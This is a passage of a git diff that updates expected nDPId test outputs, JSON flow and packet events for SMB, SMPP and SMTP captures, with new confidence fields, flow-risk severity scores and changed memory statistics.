 01127{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"smb_deletefile.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1584368315418,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":1584368315418,"pkt":"KDc3AG3I2MuK4S0uCABFAAIcOK5AAIAGO6zAqAG7wKgBdgG93hDyQzIj6KAG5lAYEAjw+QAAAAAB8P5TTUJAAAEAAAAAAAUAAAABAAAAmAAAAJwPAAAAAAAA\/\/4AABEAAAAdAAAAACgAAAAAAAAAAAAAAAAAAAAAAABZAAAAAQAAAPJad+s0itQBeC8Pcpz71QGM0O1xnPvVAYzQ7XGc+9UBACAAAAAAAAAAIAAAAAAAABEAAAAAAAAAEgQAAAoAAABlAAAACgAAAAAAAAAAAAAA\/lNNQkAAAQAAAAAADgAAAAUAAADYAAAAnQ8AAAAAAAD\/\/gAAEQAAAB0AAAAAKAAAAAAAAAAAAAAAAAAAAAAAAAkASACOAAAAAAAAAAAAAAAzwlM5LZjUATN2tkyb+9UBqrZQPC2Y1AHHrtHNIlnVAYD0HQAAAAAAAAAeAAAAAAAgAAAAJgAAAAAAAAAYAEkATgBOAE8AUwBFAH4AMQAuAEUAWABFAAAAq04CAAAAAQBpAG4AbgBvAHMAZQB0AHUAcAAtADUALgA2AC4AMQAuAGUAeABlAAAA\/lNNQkAAAQAAAAAABgADAAUAAAAAAAAAng8AAAAAAAD\/\/gAAEQAAAB0AAAAAKAAAAAAAAAAAAAAAAAAAAAAAADwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
 00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"smb_deletefile.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1584368315418,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1584368315418,"pkt":"2MuK4S0uKDc3AG3ICABFAAAoAABAAEAGtk7AqAF2wKgBu94QAb3ooAbm8kM0F1AQqfyLpgAA"}
-00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":101,"source":"smb_deletefile.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":101,"flow_first_seen":1584368315417,"flow_last_seen":1584368317802,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":25252,"flow_avg_l4_payload_len":250,"midstream":1,"ts_msec":1584368317802,"l3_proto":"ip4","src_ip":"192.168.1.118","dst_ip":"192.168.1.187","src_port":56848,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NetBIOS.SMBv23","breed":"Acceptable","category":"System"}}
+00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":101,"source":"smb_deletefile.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":101,"flow_first_seen":1584368315417,"flow_last_seen":1584368317802,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":25252,"flow_avg_l4_payload_len":250,"midstream":1,"ts_msec":1584368317802,"l3_proto":"ip4","src_ip":"192.168.1.118","dst_ip":"192.168.1.187","src_port":56848,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv23","breed":"Acceptable","category":"System"}}
 00163{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":101,"source":"smb_deletefile.pcap","alias":"nDPId-test","total-events-serialized":8}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 101/101
@@ -14,9 +14,9 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4597758 bytes
-~~ total memory freed........: 4597758 bytes
-~~ total allocations/frees...: 99654/99654
+~~ total memory allocated....: 4682711 bytes
+~~ total memory freed........: 4682711 bytes
+~~ total allocations/frees...: 101244/101244
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 168 chars
 ~~ json string max len.......: 1132 chars
diff --git a/test/results/smbv1.pcap.out b/test/results/smbv1.pcap.out
index 95e7f15b8..4ea22253a 100644
--- a/test/results/smbv1.pcap.out
+++ b/test/results/smbv1.pcap.out
@@ -3,8 +3,8 @@
 00628{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"smbv1.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1492191036092,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":191,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":191,"pkt_l4_len":157,"ts_msec":1492191036092,"pkt":"AFBW6AqxAAwpAu9qCABFAACxF9IAAIAGzm+sEJyCCoAA88bvAb3S22hjm3waG1AY+vCemgAAAAAAhf9TTUJyAAAAABhTwAAAAAAAAAAAAAAAAAAA\/\/4AAEAAAGIAAlBDIE5FVFdPUksgUFJPR1JBTSAxLjAAAkxBTk1BTjEuMAACV2luZG93cyBmb3IgV29ya2dyb3VwcyAzLjFhAAJMTTEuMlgwMDIAAkxBTk1BTjIuMQACTlQgTE0gMC4xMgA="}
 00601{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"smbv1.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1492191036120,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"ts_msec":1492191036120,"pkt":"AAwpAu9qAFBW6AqxCABFAACdcSEAAIAGdTQKgADzrBCcggG9xu+bfBob0tto7FAY+vCpnwAAAAAAcf9TTUJyAAAAAJhTwAAAAAAAAAAAAAAAAAAA\/\/4AAEAAEQUAAzIAAQAEEQAAAAABAAAAAAD84wEAQPSc00S10gHwAAgsAAirHC\/h7OapVwBPAFIASwBHAFIATwBVAFAAAABKAE8ASABOAC0AUABDAAAA"}
 00633{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"smbv1.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1492191036120,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":194,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":194,"pkt_l4_len":160,"ts_msec":1492191036120,"pkt":"AFBW6AqxAAwpAu9qCABFAAC0F9MAAIAGzmusEJyCCoAA88bvAb3S22jsm3wakFAY+ns\/iQAAAAAAiP9TTUJzAAAAABgHwAAAAAAAAAAAAAAAAAAA\/\/4AAEAADf8AiAAEEQoAAAAAAAAAAQAAAAAAAADUAAAASwAAAAAAAFcAaQBuAGQAbwB3AHMAIAAyADAAMAAwACAAMgAxADkANQAAAFcAaQBuAGQAbwB3AHMAIAAyADAAMAAwACAANQAuADAAAAA="}
-00723{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"smbv1.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1492191036092,"flow_last_seen":1492191036120,"flow_idle_time":7440000,"flow_min_l4_payload_len":117,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":394,"flow_avg_l4_payload_len":131,"midstream":1,"ts_msec":1492191036120,"l3_proto":"ip4","src_ip":"172.16.156.130","dst_ip":"10.128.0.243","src_port":50927,"dst_port":445,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","20":"SMB Insecure Version","22":"Unsafe Protocol"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
-00761{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7,"source":"smbv1.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1492191036092,"flow_last_seen":1492191036191,"flow_idle_time":7440000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":189,"flow_tot_l4_payload_len":819,"flow_avg_l4_payload_len":117,"midstream":1,"ts_msec":1492191036191,"l3_proto":"ip4","src_ip":"172.16.156.130","dst_ip":"10.128.0.243","src_port":50927,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port","20":"SMB Insecure Version","22":"Unsafe Protocol"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
+00995{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"smbv1.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1492191036092,"flow_last_seen":1492191036120,"flow_idle_time":7440000,"flow_min_l4_payload_len":117,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":394,"flow_avg_l4_payload_len":131,"midstream":1,"ts_msec":1492191036120,"l3_proto":"ip4","src_ip":"172.16.156.130","dst_ip":"10.128.0.243","src_port":50927,"dst_port":445,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"20": {"risk":"SMB Insecure Version","severity":"High","risk_score": {"total":500,"client":350,"server":150}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
+01033{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7,"source":"smbv1.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1492191036092,"flow_last_seen":1492191036191,"flow_idle_time":7440000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":189,"flow_tot_l4_payload_len":819,"flow_avg_l4_payload_len":117,"midstream":1,"ts_msec":1492191036191,"l3_proto":"ip4","src_ip":"172.16.156.130","dst_ip":"10.128.0.243","src_port":50927,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"20": {"risk":"SMB Insecure Version","severity":"High","risk_score": {"total":500,"client":350,"server":150}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
 00152{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":7,"source":"smbv1.pcap","alias":"nDPId-test","total-events-serialized":8}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 7/7
@@ -14,10 +14,10 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4597080 bytes
-~~ total memory freed........: 4597080 bytes
-~~ total allocations/frees...: 99561/99561
+~~ total memory allocated....: 4682033 bytes
+~~ total memory freed........: 4682033 bytes
+~~ total allocations/frees...: 101151/101151
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 157 chars
-~~ json string max len.......: 766 chars
-~~ json string avg len.......: 519 chars
+~~ json string max len.......: 1038 chars
+~~ json string avg len.......: 638 chars
diff --git a/test/results/smpp_in_general.pcap.out b/test/results/smpp_in_general.pcap.out
index 4c25812f1..485ef8cb0 100644
--- a/test/results/smpp_in_general.pcap.out
+++ b/test/results/smpp_in_general.pcap.out
@@ -3,8 +3,8 @@
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"smpp_in_general.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1217149853878,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1217149853878,"pkt":"AAKlxo7UABbU5r3hCABFAAAwUN5AAIAG\/3kK4sp2CuLKNQbqIyjmvft6AAAAAHACf\/9NLQAAAgQE7AEBBAI="}
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"smpp_in_general.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1217149853879,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"ts_msec":1217149853879,"pkt":"ABbU5r3hAAKlxo7UCABFAAAsMy0AADwGoS8K4so1CuLKdiMoBuqoDP5A5r37e2AS8ABLDAAAAgQFtAAA"}
 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"smpp_in_general.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1217149853879,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1217149853879,"pkt":"AAKlxo7UABbU5r3hCABFAAAoUN9AAIAG\/4AK4sp2CuLKNQbqIyjmvft7qAz+QVAQhOTN5QAA"}
-00615{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"smpp_in_general.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1217149853878,"flow_last_seen":1217149853879,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":10,"midstream":0,"ts_msec":1217149853879,"l3_proto":"ip4","src_ip":"10.226.202.118","dst_ip":"10.226.202.53","src_port":1770,"dst_port":9000,"l4_proto":"tcp","ndpi": {"proto":"SMPP","breed":"Acceptable","category":"Download"}}
-00656{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":17,"source":"smpp_in_general.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1217149853878,"flow_last_seen":1217149884833,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":11,"midstream":0,"ts_msec":1217149884833,"l3_proto":"ip4","src_ip":"10.226.202.118","dst_ip":"10.226.202.53","src_port":1770,"dst_port":9000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SMPP","breed":"Acceptable","category":"Download"}}
+00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"smpp_in_general.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1217149853878,"flow_last_seen":1217149853879,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":10,"midstream":0,"ts_msec":1217149853879,"l3_proto":"ip4","src_ip":"10.226.202.118","dst_ip":"10.226.202.53","src_port":1770,"dst_port":9000,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"SMPP","breed":"Acceptable","category":"Download"}}
+00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":17,"source":"smpp_in_general.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1217149853878,"flow_last_seen":1217149884833,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":11,"midstream":0,"ts_msec":1217149884833,"l3_proto":"ip4","src_ip":"10.226.202.118","dst_ip":"10.226.202.53","src_port":1770,"dst_port":9000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SMPP","breed":"Acceptable","category":"Download"}}
 00163{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":17,"source":"smpp_in_general.pcap","alias":"nDPId-test","total-events-serialized":8}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 17/17
@@ -14,10 +14,10 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4597370 bytes
-~~ total memory freed........: 4597370 bytes
-~~ total allocations/frees...: 99571/99571
+~~ total memory allocated....: 4682323 bytes
+~~ total memory freed........: 4682323 bytes
+~~ total allocations/frees...: 101161/101161
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 168 chars
-~~ json string max len.......: 661 chars
-~~ json string avg len.......: 475 chars
+~~ json string max len.......: 687 chars
+~~ json string avg len.......: 486 chars
diff --git a/test/results/smtp-starttls.pcap.out b/test/results/smtp-starttls.pcap.out
index ed608598e..e1f862d2d 100644
--- a/test/results/smtp-starttls.pcap.out
+++ b/test/results/smtp-starttls.pcap.out
@@ -3,8 +3,8 @@
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"smtp-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1388017124762,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1388017124762,"pkt":"AAAMB6wBABNyxPHhCABFAAA8JqtAAEAGeocKAAABrcJEGuA+ABlXuT72AAAAAKACOQgLsAAAAgQFtAQCCAraWRhdAAAAAAEDAwc="}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"smtp-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1388017124774,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1388017124774,"pkt":"ABNyxPHhANAr0XYACABFAAA8X3cAAC4Gk7utwkQaCgAAAQAZ4D6dvxfqV7k+96ASpiw5gwAAAgQFlgQCCAoS8Zx72lkYXQEDAwY="}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"smtp-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1388017124774,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1388017124774,"pkt":"AAAMB6wBABNyxPHhCABFAAA0JqxAAEAGeo4KAAABrcJEGuA+ABlXuT73nb8X64AQAHMN3wAAAQEICtpZGGgS8Zx7"}
-00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"smtp-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1388017124762,"flow_last_seen":1388017124785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":12,"midstream":0,"ts_msec":1388017124785,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"173.194.68.26","src_port":57406,"dst_port":25,"l4_proto":"tcp","ndpi": {"proto":"SMTP.Google","breed":"Acceptable","category":"Web"},"smtp": {"user":"","password":""}}
-00653{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":36,"source":"smtp-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1388017124762,"flow_last_seen":1388017125239,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":6011,"flow_avg_l4_payload_len":166,"midstream":0,"ts_msec":1388017125239,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"173.194.68.26","src_port":57406,"dst_port":25,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SMTP.Google","breed":"Acceptable","category":"Web"}}
+00668{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"smtp-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1388017124762,"flow_last_seen":1388017124785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":12,"midstream":0,"ts_msec":1388017124785,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"173.194.68.26","src_port":57406,"dst_port":25,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"SMTP.Google","breed":"Acceptable","category":"Web"},"smtp": {"user":"","password":""}}
+00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":36,"source":"smtp-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1388017124762,"flow_last_seen":1388017125239,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":6011,"flow_avg_l4_payload_len":166,"midstream":0,"ts_msec":1388017125239,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"173.194.68.26","src_port":57406,"dst_port":25,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SMTP.Google","breed":"Acceptable","category":"Web"}}
 00161{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":36,"source":"smtp-starttls.pcap","alias":"nDPId-test","total-events-serialized":8}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 36/36
@@ -14,10 +14,10 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4595873 bytes
-~~ total memory freed........: 4595873 bytes
-~~ total allocations/frees...: 99589/99589
+~~ total memory allocated....: 4680826 bytes
+~~ total memory freed........: 4680826 bytes
+~~ total allocations/frees...: 101179/101179
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 166 chars
-~~ json string max len.......: 658 chars
-~~ json string avg len.......: 474 chars
+~~ json string max len.......: 684 chars
+~~ json string avg len.......: 486 chars
diff --git a/test/results/smtp.pcap.out b/test/results/smtp.pcap.out
index 6208b72af..83e11b969 100644
--- a/test/results/smtp.pcap.out
+++ b/test/results/smtp.pcap.out
@@ -3,8 +3,8 @@
 00445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"smtp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":934028408568,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"ts_msec":934028408568,"pkt":"AMBPo1fbABB7OEYzCABFAAAsEDMAAD8GkhjCB\/iZrBByzwhPABnlqEITAAAAAGACAgCMgQAAAgQFtAAA"}
 00444{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"smtp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":934028408569,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"ts_msec":934028408569,"pkt":"ABB7OEYzAMBPo1fbCABFAAAsFcQAAEAGi4esEHLPwgf4mQAZCE+jURBm5ahCFGASf+Ba2AAAAgQFtAW0"}
 00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"smtp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":934028408570,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"ts_msec":934028408570,"pkt":"AMBPo1fbABB7OEYzCABFAAAoEDRAAD8GUhvCB\/iZrBByzwhPABnlqEIUo1EQZ1AQfXh0\/QAAAAAAAAAA"}
-00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"smtp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":934028408568,"flow_last_seen":934028408647,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":84,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":19,"midstream":0,"ts_msec":934028408647,"l3_proto":"ip4","src_ip":"194.7.248.153","dst_ip":"172.16.114.207","src_port":2127,"dst_port":25,"l4_proto":"tcp","ndpi": {"proto":"SMTP","breed":"Acceptable","category":"Email"},"smtp": {"user":"","password":""}}
-00642{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":95,"source":"smtp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":95,"flow_first_seen":934028408568,"flow_last_seen":934028408801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":17955,"flow_avg_l4_payload_len":189,"midstream":0,"ts_msec":934028408801,"l3_proto":"ip4","src_ip":"194.7.248.153","dst_ip":"172.16.114.207","src_port":2127,"dst_port":25,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SMTP","breed":"Acceptable","category":"Email"}}
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"smtp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":934028408568,"flow_last_seen":934028408647,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":84,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":19,"midstream":0,"ts_msec":934028408647,"l3_proto":"ip4","src_ip":"194.7.248.153","dst_ip":"172.16.114.207","src_port":2127,"dst_port":25,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"SMTP","breed":"Acceptable","category":"Email"},"smtp": {"user":"","password":""}}
+00668{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":95,"source":"smtp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":95,"flow_first_seen":934028408568,"flow_last_seen":934028408801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":17955,"flow_avg_l4_payload_len":189,"midstream":0,"ts_msec":934028408801,"l3_proto":"ip4","src_ip":"194.7.248.153","dst_ip":"172.16.114.207","src_port":2127,"dst_port":25,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SMTP","breed":"Acceptable","category":"Email"}}
 00152{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":95,"source":"smtp.pcap","alias":"nDPId-test","total-events-serialized":8}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 95/95
@@ -14,10 +14,10 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4599632 bytes
-~~ total memory freed........: 4599632 bytes
-~~ total allocations/frees...: 99649/99649
+~~ total memory allocated....: 4684585 bytes
+~~ total memory freed........: 4684585 bytes
+~~ total allocations/frees...: 101239/101239
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 157 chars
-~~ json string max len.......: 647 chars
-~~ json string avg len.......: 465 chars
+~~ json string max len.......: 673 chars
+~~ json string avg len.......: 476 chars
